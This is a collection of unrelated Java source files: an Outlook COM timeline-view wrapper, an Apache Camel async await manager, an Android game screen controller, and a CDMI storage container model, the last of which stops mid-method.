public class _TimelineViewImpl extends Dispatch implements com.wilutions.mslib.outlook._TimelineView {
@DeclDISPID(61440) public com.wilutions.mslib.outlook._Application getApplication() throws ComException {
final Object obj = this._dispatchCall(61440,"Application", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return Dispatch.as(obj, com.wilutions.mslib.outlook.impl._ApplicationImpl.class);
}
@DeclDISPID(61450) public com.wilutions.mslib.outlook.OlObjectClass getClass_() throws ComException {
final Object obj = this._dispatchCall(61450,"Class", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlObjectClass.valueOf((Integer)obj);
}
@DeclDISPID(61451) public com.wilutions.mslib.outlook._NameSpace getSession() throws ComException {
final Object obj = this._dispatchCall(61451,"Session", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return Dispatch.as(obj, com.wilutions.mslib.outlook.impl._NameSpaceImpl.class);
}
@DeclDISPID(61441) public IDispatch getParent() throws ComException {
final Object obj = this._dispatchCall(61441,"Parent", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (IDispatch)obj;
}
@DeclDISPID(407) public void Apply() throws ComException {
this._dispatchCall(407,"Apply", DISPATCH_METHOD,null);
}
@DeclDISPID(61490) public com.wilutions.mslib.outlook.View Copy(final String Name, final com.wilutions.mslib.outlook.OlViewSaveOption SaveOption) throws ComException {
assert(Name != null);
assert(SaveOption != null);
final Object obj = this._dispatchCall(61490,"Copy", DISPATCH_METHOD,null,Name,SaveOption.value);
if (obj == null) return null;
return Dispatch.as(obj, com.wilutions.mslib.outlook.impl.ViewImpl.class);
}
@DeclDISPID(61514) public void Delete() throws ComException {
this._dispatchCall(61514,"Delete", DISPATCH_METHOD,null);
}
@DeclDISPID(64068) public void Reset() throws ComException {
this._dispatchCall(64068,"Reset", DISPATCH_METHOD,null);
}
@DeclDISPID(61512) public void Save() throws ComException {
this._dispatchCall(61512,"Save", DISPATCH_METHOD,null);
}
@DeclDISPID(64065) public String getLanguage() throws ComException {
final Object obj = this._dispatchCall(64065,"Language", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(64065) public void setLanguage(final String value) throws ComException {
assert(value != null);
this._dispatchCall(64065,"Language", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64064) public Boolean getLockUserChanges() throws ComException {
final Object obj = this._dispatchCall(64064,"LockUserChanges", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(64064) public void setLockUserChanges(final Boolean value) throws ComException {
assert(value != null);
this._dispatchCall(64064,"LockUserChanges", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(0) public String getName() throws ComException {
final Object obj = this._dispatchCall(0,"Name", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(0) public void setName(final String value) throws ComException {
assert(value != null);
this._dispatchCall(0,"Name", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64063) public com.wilutions.mslib.outlook.OlViewSaveOption getSaveOption() throws ComException {
final Object obj = this._dispatchCall(64063,"SaveOption", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlViewSaveOption.valueOf((Integer)obj);
}
@DeclDISPID(64062) public Boolean getStandard() throws ComException {
final Object obj = this._dispatchCall(64062,"Standard", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(404) public com.wilutions.mslib.outlook.OlViewType getViewType() throws ComException {
final Object obj = this._dispatchCall(404,"ViewType", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlViewType.valueOf((Integer)obj);
}
@DeclDISPID(64060) public String getXML() throws ComException {
final Object obj = this._dispatchCall(64060,"XML", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(64060) public void setXML(final String value) throws ComException {
assert(value != null);
this._dispatchCall(64060,"XML", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64054) public void GoToDate(final java.util.Date Date) throws ComException {
assert(Date != null);
this._dispatchCall(64054,"GoToDate", DISPATCH_METHOD,null,Date);
}
@DeclDISPID(409) public String getFilter() throws ComException {
final Object obj = this._dispatchCall(409,"Filter", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(409) public void setFilter(final String value) throws ComException {
assert(value != null);
this._dispatchCall(409,"Filter", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(8449) public String getStartField() throws ComException {
final Object obj = this._dispatchCall(8449,"StartField", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(8449) public void setStartField(final String value) throws ComException {
assert(value != null);
this._dispatchCall(8449,"StartField", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64379) public String getEndField() throws ComException {
final Object obj = this._dispatchCall(64379,"EndField", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(64379) public void setEndField(final String value) throws ComException {
assert(value != null);
this._dispatchCall(64379,"EndField", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64344) public com.wilutions.mslib.outlook.OrderFields getGroupByFields() throws ComException {
final Object obj = this._dispatchCall(64344,"GroupByFields", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.OrderFields.class);
}
@DeclDISPID(64384) public com.wilutions.mslib.outlook.OlDefaultExpandCollapseSetting getDefaultExpandCollapseSetting() throws ComException {
final Object obj = this._dispatchCall(64384,"DefaultExpandCollapseSetting", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlDefaultExpandCollapseSetting.valueOf((Integer)obj);
}
@DeclDISPID(64384) public void setDefaultExpandCollapseSetting(final com.wilutions.mslib.outlook.OlDefaultExpandCollapseSetting value) throws ComException {
assert(value != null);
this._dispatchCall(64384,"DefaultExpandCollapseSetting", DISPATCH_PROPERTYPUT,value.value);
}
@DeclDISPID(64373) public Boolean getShowWeekNumbers() throws ComException {
final Object obj = this._dispatchCall(64373,"ShowWeekNumbers", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(64373) public void setShowWeekNumbers(final Boolean value) throws ComException {
assert(value != null);
this._dispatchCall(64373,"ShowWeekNumbers", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64043) public Integer getMaxLabelWidth() throws ComException {
final Object obj = this._dispatchCall(64043,"MaxLabelWidth", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Integer)obj;
}
@DeclDISPID(64043) public void setMaxLabelWidth(final Integer value) throws ComException {
assert(value != null);
this._dispatchCall(64043,"MaxLabelWidth", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64372) public Boolean getShowLabelWhenViewingByMonth() throws ComException {
final Object obj = this._dispatchCall(64372,"ShowLabelWhenViewingByMonth", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(64372) public void setShowLabelWhenViewingByMonth(final Boolean value) throws ComException {
assert(value != null);
this._dispatchCall(64372,"ShowLabelWhenViewingByMonth", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64040) public com.wilutions.mslib.outlook.ViewFont getUpperScaleFont() throws ComException {
final Object obj = this._dispatchCall(64040,"UpperScaleFont", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.ViewFont.class);
}
@DeclDISPID(64044) public com.wilutions.mslib.outlook.ViewFont getLowerScaleFont() throws ComException {
final Object obj = this._dispatchCall(64044,"LowerScaleFont", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.ViewFont.class);
}
@DeclDISPID(64045) public com.wilutions.mslib.outlook.ViewFont getItemFont() throws ComException {
final Object obj = this._dispatchCall(64045,"ItemFont", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.ViewFont.class);
}
@DeclDISPID(64392) public com.wilutions.mslib.outlook.OlTimelineViewMode getTimelineViewMode() throws ComException {
final Object obj = this._dispatchCall(64392,"TimelineViewMode", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlTimelineViewMode.valueOf((Integer)obj);
}
@DeclDISPID(64392) public void setTimelineViewMode(final com.wilutions.mslib.outlook.OlTimelineViewMode value) throws ComException {
assert(value != null);
this._dispatchCall(64392,"TimelineViewMode", DISPATCH_PROPERTYPUT,value.value);
}
public _TimelineViewImpl(String progId) throws ComException {
super(progId, "{0006309C-0000-0000-C000-000000000046}");
}
protected _TimelineViewImpl(long ndisp) {
super(ndisp);
}
public String toString() {
return "[_TimelineViewImpl" + super.toString() + "]";
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.impl;
import java.util.Collection;
import java.util.Collections;
import java.util.LinkedList;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.RejectedExecutionException;
import java.util.concurrent.atomic.AtomicLong;
import org.apache.camel.Exchange;
import org.apache.camel.MessageHistory;
import org.apache.camel.NamedNode;
import org.apache.camel.processor.DefaultExchangeFormatter;
import org.apache.camel.spi.AsyncProcessorAwaitManager;
import org.apache.camel.spi.ExchangeFormatter;
import org.apache.camel.support.ServiceSupport;
import org.apache.camel.util.MessageHelper;
import org.apache.camel.util.ObjectHelper;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class DefaultAsyncProcessorAwaitManager extends ServiceSupport implements AsyncProcessorAwaitManager {
private static final Logger LOG = LoggerFactory.getLogger(DefaultAsyncProcessorAwaitManager.class);
private final AsyncProcessorAwaitManager.Statistics statistics = new UtilizationStatistics();
private final AtomicLong blockedCounter = new AtomicLong();
private final AtomicLong interruptedCounter = new AtomicLong();
private final AtomicLong totalDuration = new AtomicLong();
private final AtomicLong minDuration = new AtomicLong();
private final AtomicLong maxDuration = new AtomicLong();
private final AtomicLong meanDuration = new AtomicLong();
private final Map<Exchange, AwaitThread> inflight = new ConcurrentHashMap<>();
private final ExchangeFormatter exchangeFormatter;
private boolean interruptThreadsWhileStopping = true;
public DefaultAsyncProcessorAwaitManager() {
// setup exchange formatter to be used for message history dump
DefaultExchangeFormatter formatter = new DefaultExchangeFormatter();
formatter.setShowExchangeId(true);
formatter.setMultiline(true);
formatter.setShowHeaders(true);
formatter.setStyle(DefaultExchangeFormatter.OutputStyle.Fixed);
this.exchangeFormatter = formatter;
}
@Override
public void await(Exchange exchange, CountDownLatch latch) {
LOG.trace("Waiting for asynchronous callback before continuing for exchangeId: {} -> {}",
exchange.getExchangeId(), exchange);
try {
if (statistics.isStatisticsEnabled()) {
blockedCounter.incrementAndGet();
}
inflight.put(exchange, new AwaitThreadEntry(Thread.currentThread(), exchange, latch));
latch.await();
LOG.trace("Asynchronous callback received, will continue routing exchangeId: {} -> {}",
exchange.getExchangeId(), exchange);
} catch (InterruptedException e) {
LOG.trace("Interrupted while waiting for callback, will continue routing exchangeId: {} -> {}",
exchange.getExchangeId(), exchange);
exchange.setException(e);
} finally {
AwaitThread thread = inflight.remove(exchange);
if (statistics.isStatisticsEnabled() && thread != null) {
long time = thread.getWaitDuration();
long total = totalDuration.get() + time;
totalDuration.set(total);
if (time < minDuration.get()) {
minDuration.set(time);
} else if (time > maxDuration.get()) {
maxDuration.set(time);
}
// update mean
long count = blockedCounter.get();
long mean = count > 0 ? total / count : 0;
meanDuration.set(mean);
}
}
}
@Override
public void countDown(Exchange exchange, CountDownLatch latch) {
LOG.trace("Asynchronous callback received for exchangeId: {}", exchange.getExchangeId());
latch.countDown();
}
@Override
public int size() {
return inflight.size();
}
@Override
public Collection<AwaitThread> browse() {
return Collections.unmodifiableCollection(inflight.values());
}
@Override
public void interrupt(String exchangeId) {
// need to find the exchange with the given exchange id
Exchange found = null;
for (AsyncProcessorAwaitManager.AwaitThread entry : browse()) {
Exchange exchange = entry.getExchange();
if (exchangeId.equals(exchange.getExchangeId())) {
found = exchange;
break;
}
}
if (found != null) {
interrupt(found);
}
}
@Override
public void interrupt(Exchange exchange) {
AwaitThreadEntry entry = (AwaitThreadEntry) inflight.get(exchange);
if (entry != null) {
try {
StringBuilder sb = new StringBuilder();
sb.append("Interrupted while waiting for asynchronous callback, will release the following blocked thread which was waiting for exchange to finish processing with exchangeId: ");
sb.append(exchange.getExchangeId());
sb.append("\n");
sb.append(dumpBlockedThread(entry));
// dump a route stack trace of the exchange
String routeStackTrace = MessageHelper.dumpMessageHistoryStacktrace(exchange, exchangeFormatter, false);
if (routeStackTrace != null) {
sb.append(routeStackTrace);
}
LOG.warn(sb.toString());
} catch (Exception e) {
throw ObjectHelper.wrapRuntimeCamelException(e);
} finally {
if (statistics.isStatisticsEnabled()) {
interruptedCounter.incrementAndGet();
}
exchange.setException(new RejectedExecutionException("Interrupted while waiting for asynchronous callback for exchangeId: " + exchange.getExchangeId()));
entry.getLatch().countDown();
}
}
}
public boolean isInterruptThreadsWhileStopping() {
return interruptThreadsWhileStopping;
}
public void setInterruptThreadsWhileStopping(boolean interruptThreadsWhileStopping) {
this.interruptThreadsWhileStopping = interruptThreadsWhileStopping;
}
public Statistics getStatistics() {
return statistics;
}
@Override
protected void doStart() throws Exception {
// noop
}
@Override
protected void doStop() throws Exception {
Collection<AwaitThread> threads = browse();
int count = threads.size();
if (count > 0) {
LOG.warn("Shutting down while there are still {} inflight threads currently blocked.", count);
StringBuilder sb = new StringBuilder();
for (AwaitThread entry : threads) {
sb.append(dumpBlockedThread(entry));
}
if (isInterruptThreadsWhileStopping()) {
LOG.warn("The following threads are blocked and will be interrupted so the threads are released:\n" + sb.toString());
for (AwaitThread entry : threads) {
try {
interrupt(entry.getExchange());
} catch (Throwable e) {
LOG.warn("Error while interrupting thread: " + entry.getBlockedThread().getName() + ". This exception is ignored.", e);
}
}
} else {
LOG.warn("The following threads are blocked, and may reside in the JVM:\n" + sb.toString());
}
} else {
LOG.debug("Shutting down with no inflight threads.");
}
inflight.clear();
}
private static String dumpBlockedThread(AwaitThread entry) {
StringBuilder sb = new StringBuilder();
sb.append("\n");
sb.append("Blocked Thread\n");
sb.append("---------------------------------------------------------------------------------------------------------------------------------------\n");
sb.append(style("Id:")).append(entry.getBlockedThread().getId()).append("\n");
sb.append(style("Name:")).append(entry.getBlockedThread().getName()).append("\n");
sb.append(style("RouteId:")).append(safeNull(entry.getRouteId())).append("\n");
sb.append(style("NodeId:")).append(safeNull(entry.getNodeId())).append("\n");
sb.append(style("Duration:")).append(entry.getWaitDuration()).append(" msec.\n");
return sb.toString();
}
private static String style(String label) {
return String.format("\t%-20s", label);
}
private static String safeNull(Object value) {
return value != null ? value.toString() : "";
}
private static final class AwaitThreadEntry implements AwaitThread {
private final Thread thread;
private final Exchange exchange;
private final CountDownLatch latch;
private final long start;
private AwaitThreadEntry(Thread thread, Exchange exchange, CountDownLatch latch) {
this.thread = thread;
this.exchange = exchange;
this.latch = latch;
this.start = System.currentTimeMillis();
}
@Override
public Thread getBlockedThread() {
return thread;
}
@Override
public Exchange getExchange() {
return exchange;
}
@Override
public long getWaitDuration() {
return System.currentTimeMillis() - start;
}
@Override
public String getRouteId() {
MessageHistory lastMessageHistory = getLastMessageHistory();
if (lastMessageHistory == null) {
return null;
}
return lastMessageHistory.getRouteId();
}
@Override
public String getNodeId() {
NamedNode node = getNode();
if (node == null) {
return null;
}
return node.getId();
}
public CountDownLatch getLatch() {
return latch;
}
private NamedNode getNode() {
MessageHistory lastMessageHistory = getLastMessageHistory();
if (lastMessageHistory == null) {
return null;
}
return lastMessageHistory.getNode();
}
private MessageHistory getLastMessageHistory() {
LinkedList<MessageHistory> list = getMessageHistories();
if (list == null || list.isEmpty()) {
return null;
}
return list.getLast();
}
private LinkedList<MessageHistory> getMessageHistories() {
return exchange.getProperty(Exchange.MESSAGE_HISTORY, LinkedList.class);
}
@Override
public String toString() {
return "AwaitThreadEntry[name=" + thread.getName() + ", exchangeId=" + exchange.getExchangeId() + "]";
}
}
/**
* Represents utilization statistics
*/
private final class UtilizationStatistics implements AsyncProcessorAwaitManager.Statistics {
private boolean statisticsEnabled;
@Override
public long getThreadsBlocked() {
return blockedCounter.get();
}
@Override
public long getThreadsInterrupted() {
return interruptedCounter.get();
}
@Override
public long getTotalDuration() {
return totalDuration.get();
}
@Override
public long getMinDuration() {
return minDuration.get();
}
@Override
public long getMaxDuration() {
return maxDuration.get();
}
@Override
public long getMeanDuration() {
return meanDuration.get();
}
@Override
public void reset() {
blockedCounter.set(0);
interruptedCounter.set(0);
totalDuration.set(0);
minDuration.set(0);
maxDuration.set(0);
meanDuration.set(0);
}
@Override
public boolean isStatisticsEnabled() {
return statisticsEnabled;
}
@Override
public void setStatisticsEnabled(boolean statisticsEnabled) {
this.statisticsEnabled = statisticsEnabled;
}
@Override
public String toString() {
return String.format("AsyncProcessAwaitManager utilization[blocked=%s, interrupted=%s, total=%s min=%s, max=%s, mean=%s]",
getThreadsBlocked(), getThreadsInterrupted(), getTotalDuration(), getMinDuration(), getMaxDuration(), getMeanDuration());
}
}
}
|
|
package com.github.kolandroid.kol.android.game;
import android.annotation.SuppressLint;
import android.app.DialogFragment;
import android.app.Fragment;
import android.app.FragmentTransaction;
import android.os.Bundle;
import android.support.v4.widget.DrawerLayout;
import android.support.v7.app.ActionBar;
import android.support.v7.app.ActionBar.LayoutParams;
import android.view.Menu;
import android.view.View;
import android.widget.ProgressBar;
import android.widget.TextView;
import com.github.kolandroid.kol.android.R;
import com.github.kolandroid.kol.android.controller.Controller;
import com.github.kolandroid.kol.android.controller.ModelController;
import com.github.kolandroid.kol.android.controller.UpdatableController;
import com.github.kolandroid.kol.android.controller.UpdateController;
import com.github.kolandroid.kol.android.controllers.chat.ChatCounterController;
import com.github.kolandroid.kol.android.controllers.stats.StatsGlanceController;
import com.github.kolandroid.kol.android.controllers.web.WebController;
import com.github.kolandroid.kol.android.screen.ActivityScreen;
import com.github.kolandroid.kol.android.screen.DialogScreen;
import com.github.kolandroid.kol.android.screen.DrawerScreen;
import com.github.kolandroid.kol.android.screen.FragmentScreen;
import com.github.kolandroid.kol.android.screen.ScreenSelection;
import com.github.kolandroid.kol.android.screen.ViewScreen;
import com.github.kolandroid.kol.android.util.HandlerCallback;
import com.github.kolandroid.kol.android.view.AndroidViewContext;
import com.github.kolandroid.kol.android.view.PopupLoader;
import com.github.kolandroid.kol.gamehandler.LoadingContext;
import com.github.kolandroid.kol.model.Model;
import com.github.kolandroid.kol.model.models.stats.StatsGlanceModel;
import com.github.kolandroid.kol.session.Session;
import com.github.kolandroid.kol.util.Logger;
public class GameScreen extends ActivityScreen {
private StatsGlanceController stats;
private SidebarController sidebar;
private DrawerScreen navigationScreen;
private HandlerCallback<Void> sidebarUpdater;
private LoadingContext loader;
private Controller chatIconController;
@Override
protected AndroidViewContext createViewContext() {
// Set up the bottom loading bar
View base = this.findViewById(R.id.game_progress_popup);
ProgressBar bar = (ProgressBar) this
.findViewById(R.id.game_progress_bar);
TextView text = (TextView) this.findViewById(R.id.game_progress_text);
base.setVisibility(View.GONE);
PopupLoader loader = new PopupLoader(base, bar, text);
return new AndroidViewContext(this, loader, this.getClass());
}
@Override
public Controller setup(Bundle savedInstanceState, Controller controller) {
Session session = null;
if (controller != null && controller instanceof ModelController) {
// Load the session for the provided model
@SuppressWarnings("unchecked")
ModelController<? extends Model> c = (ModelController<? extends Model>) controller;
Model model = c.getModel();
session = model.getSession();
}
// Set up the chat icon.
if (savedInstanceState != null && savedInstanceState.containsKey("chat_controller")) {
chatIconController = (ChatCounterController) savedInstanceState.getSerializable("chat_controller");
} else if (session != null) {
chatIconController = new ChatCounterController(session);
} else {
Logger.log("GameScreen", "Controller " + controller + " has no session; cannot be used to start GameScreen");
}
// Set up the drawer.
if (savedInstanceState != null && savedInstanceState.containsKey("sidebar_controller")) {
sidebar = (SidebarController) savedInstanceState.getSerializable("sidebar_controller");
} else if (session != null) {
sidebar = new SidebarController(session);
} else {
Logger.log("GameScreen", "Controller " + controller + " has no session; cannot be used to start GameScreen");
}
// Set up the stats pane.
if (savedInstanceState != null && savedInstanceState.containsKey("stats_controller")) {
stats = (StatsGlanceController) savedInstanceState.get("stats_controller");
} else if (session != null) {
stats = new StatsGlanceController(new StatsGlanceModel(session));
} else {
Logger.log("GameScreen", "Controller " + controller + " has no session; cannot be used to start GameScreen");
}
if (stats != null && sidebar != null) {
sidebarUpdater = new UpdateSidebarHandler(sidebar);
stats.attachNotificationCallback(sidebarUpdater.weak());
}
if (sidebar != null) {
navigationScreen = DrawerScreen.create(sidebar);
getFragmentManager().beginTransaction()
.replace(R.id.navigation_drawer, navigationScreen).commit();
navigationScreen.setUp(this, R.id.navigation_drawer,
(DrawerLayout) findViewById(R.id.drawer_layout), R.drawable.ic_map_black_24dp);
}
ActionBar actionBar = getSupportActionBar();
if (actionBar != null && stats != null) {
actionBar.setDisplayShowCustomEnabled(true);
actionBar.setDisplayShowTitleEnabled(false);
ViewScreen statsScreen = new ViewScreen(this);
statsScreen.display(stats, this);
//Set the custom view to fill the action bar
LayoutParams params = new LayoutParams(LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT);
actionBar.setCustomView(statsScreen, params);
}
return controller;
}
@Override
protected void displayController(Controller c, final boolean addToBackStack) {
Fragment dialog = getFragmentManager().findFragmentByTag("dialog");
if (dialog != null && dialog instanceof DialogFragment) {
Logger.log("GameScreen", "Dismissing dialog box");
((DialogFragment) dialog).dismiss();
}
c.chooseScreen(new ScreenSelection() {
@Override
public void displayExternal(Controller c) {
Logger.log("GameScreen", "ERROR: Controller " + c + " has chosen to appear on an external screen. Rerouting...");
displayPrimary(c, false);
}
@Override
public void displayExternalDialog(Controller c, boolean cancellable) {
Logger.log("GameScreen", "ERROR: Controller " + c + " has chosen to appear on an external dialog. Rerouting...");
displayDialog(c);
}
@Override
public void displayPrimaryUpdate(UpdateController c, boolean displayIfUnable) {
// We have to do a more complicated check to see if the same controller type is currently displayed
Fragment current = getFragmentManager().findFragmentByTag("game_screen");
if (current != null && current instanceof FragmentScreen) {
Controller currentController = ((FragmentScreen) current).getController();
if (currentController != null && currentController instanceof UpdatableController) {
UpdatableController toUpdate = (UpdatableController) currentController;
if (toUpdate.tryApply(c.getUpdateType(), c.getModel())) {
Logger.log("GameScreen", "Update " + c + " applied to " + toUpdate);
refreshStatsPane();
return;
}
Logger.log("GameScreen", "Unable to apply update " + c + " to " + toUpdate);
}
}
if (displayIfUnable) {
displayPrimary(c);
}
}
@Override
public void displayChat(Controller c) {
Logger.log("GameScreen", "ERROR: Controller " + c + " has chosen to appear on in the chat. Ignoring.");
}
private void displayPrimary(Controller c, boolean addToBackStack) {
FragmentScreen screen = FragmentScreen.create(c);
@SuppressLint("CommitTransaction") FragmentTransaction trans = getFragmentManager()
.beginTransaction().replace(R.id.game_main_screen, screen, "game_screen");
if (addToBackStack) {
Logger.log("GameScreen", "History saved");
trans = trans.addToBackStack("a");
}
trans.commit();
if (!(c instanceof WebController)) {
refreshStatsPane();
}
}
@Override
public void displayPrimary(Controller c) {
Logger.log("GameScreen", "Displaying " + c + " on primary pane");
displayPrimary(c, addToBackStack);
}
@Override
public void displayDialog(Controller c) {
Logger.log("GameScreen", "Displaying " + c + " on new dialog box");
DialogScreen.display(c, GameScreen.this);
}
});
}
@Override
protected int getContentView() {
return R.layout.activity_game_view;
}
public void refreshStatsPane() {
if (stats != null)
stats.refresh();
}
@Override
public void onSaveInstanceState(Bundle savedInstanceState) {
super.onSaveInstanceState(savedInstanceState);
savedInstanceState.putSerializable("stats_controller", stats);
savedInstanceState.putSerializable("sidebar_controller", sidebar);
savedInstanceState.putSerializable("chat_controller", chatIconController);
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.game_screen, menu);
View chatIconView = menu.findItem(R.id.action_chat).getActionView();
if (chatIconController != null) {
chatIconController.attach(chatIconView, this);
chatIconController.connect(chatIconView, this);
}
return true;
}
@Override
public void onDestroy() {
super.onDestroy();
if (chatIconController != null) {
chatIconController.disconnect(this);
}
if (sidebarUpdater != null) {
sidebarUpdater.close();
sidebarUpdater = null;
}
}
@Override
public void onBackPressed() {
//This appears to be necessary to make fragment backtracking actually work without the v4 support library...
// Close the navigation drawer if open
if (navigationScreen != null && navigationScreen.isOpen()) {
navigationScreen.close();
return;
}
// Attempt to pop the next fragment off the stack
if (!getFragmentManager().popBackStackImmediate()) {
//TODO: replace with Logout? message
super.onBackPressed();
}
}
}
|
|
/*
* Original work Copyright (c) 2010, Sun Microsystems, Inc. Copyright (c) 2010, The Storage
* Networking Industry Association.
*
* Modified work Copyright (c) 2016, Karlsruhe Institute of Technology (KIT)
*
* Redistribution and use in source and binary forms, with or without modification, are permitted
* provided that the following conditions are met:
*
* Redistributions of source code must retain the above copyright notice, this list of conditions
* and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions
* and the following disclaimer in the documentation and/or other materials provided with the
* distribution.
*
* Neither the name of The Storage Networking Industry Association (SNIA) nor the names of its
* contributors may be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
* FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
* WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
* WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package org.snia.cdmiserver.model;
import org.json.JSONArray;
import org.json.JSONObject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.snia.cdmiserver.util.MediaTypes;
/**
* <p>
* Representation of a CDMI <em>Container</em>.
* </p>
*/
public class Container extends CdmiObject {
@SuppressWarnings("unused")
private static final Logger LOG = LoggerFactory.getLogger(Container.class);
private String objectType;
private String objectName;
private String parentUri;
private String parentId;
private String domainUri;
private String capabilitiesUri;
private String completionStatus;
private String percentComplete;
private JSONObject metadata;
private JSONObject exports;
private JSONArray snapshots;
private String childrenrange;
private JSONArray children;
private String deserializevalue;
private String reference;
private String move;
private String copy;
private String deserialize;
private Container() {}
/**
* Creates a new container with the mandatory fields.
*
* @param objectName the container's name
* @param parentUri the container's parent URI
* @param parentId the container's parent objectId
*/
public Container(String objectName, String parentUri, String parentId) {
super();
this.objectName = objectName;
this.parentUri = parentUri;
this.parentId = parentId;
// default values
this.objectType = MediaTypes.CONTAINER;
this.domainUri = "/cdmi_domains";
this.capabilitiesUri = "/cdmi_capabilities/container";
this.completionStatus = "Complete";
this.metadata = new JSONObject();
this.children = new JSONArray();
this.childrenrange = "";
}
public String getObjectType() {
return objectType;
}
public void setObjectType(String objectType) {
this.objectType = objectType;
}
public String getObjectName() {
return objectName;
}
public void setObjectName(String objectName) {
this.objectName = objectName;
}
public String getParentUri() {
return parentUri;
}
public void setParentUri(String parentUri) {
this.parentUri = parentUri;
}
public String getParentId() {
return parentId;
}
public void setParentId(String parentId) {
this.parentId = parentId;
}
public String getDomainUri() {
return domainUri;
}
public void setDomainUri(String domainUri) {
this.domainUri = domainUri;
}
public String getCapabilitiesUri() {
return capabilitiesUri;
}
public void setCapabilitiesUri(String capabilitiesUri) {
this.capabilitiesUri = capabilitiesUri;
}
public String getCompletionStatus() {
return completionStatus;
}
public void setCompletionStatus(String completionStatus) {
this.completionStatus = completionStatus;
}
public String getPercentComplete() {
return percentComplete;
}
public void setPercentComplete(String percentComplete) {
this.percentComplete = percentComplete;
}
public JSONObject getMetadata() {
return metadata;
}
public void setMetadata(JSONObject metadata) {
this.metadata = metadata;
}
public JSONObject getExports() {
return exports;
}
public void setExports(JSONObject exports) {
this.exports = exports;
}
public JSONArray getSnapshots() {
return snapshots;
}
public void setSnapshots(JSONArray snapshots) {
this.snapshots = snapshots;
}
public String getChildrenrange() {
return childrenrange;
}
public void setChildrenrange(String childrenrange) {
this.childrenrange = childrenrange;
}
public JSONArray getChildren() {
return children;
}
public void setChildren(JSONArray children) {
this.children = children;
}
public String getDeserializedvalue() {
return deserializevalue;
}
public void setDeserializedvalue(String deserializevalue) {
